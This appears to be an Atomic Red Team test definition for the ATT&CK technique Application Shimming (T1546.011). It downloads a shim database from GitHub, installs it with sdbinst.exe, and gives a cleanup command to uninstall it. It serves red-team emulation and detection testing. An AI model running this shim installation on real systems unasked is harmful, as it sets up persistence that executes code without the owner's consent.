#TechniqueName: Event Triggered Execution: Application Shimming
#AtomicTestName: Application Shim Installation
#Language: cmd

#get_prereq_commands
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb"


#prereq_commands
if (Test-Path PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb) {exit 0} else {exit 1}


#commands
sdbinst.exe PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb


#cleanup_commands
sdbinst.exe -u PathToAtomicsFolder\T1546.011\bin\AtomicShimx86.sdb >nul 2>&1

